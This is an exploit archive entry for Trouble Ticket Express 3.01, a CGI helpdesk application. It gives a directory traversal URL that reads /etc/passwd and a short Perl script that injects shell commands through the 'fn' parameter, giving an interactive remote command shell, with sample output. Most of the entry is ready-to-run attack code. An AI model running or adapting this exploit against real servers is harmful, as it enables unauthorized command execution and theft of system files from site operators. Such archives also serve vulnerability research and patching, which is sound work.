Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal

Author: zombiefx
type: webapps
platform: cgi
port: 
date_added: 2010-03-13 
date_updated:  
verified: 1 
codes: OSVDB-62997 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comttx301.zip

# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>>
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:

# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd

#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = 'http://localhost/cgi-bin/ttx.cgi';
print '$ ';
while (<>) {
    print get( $url . '?cmd=file&fn=|' . $_ . '|' );
    print '$ ';
}
<mailto:darkernet@gmail.com>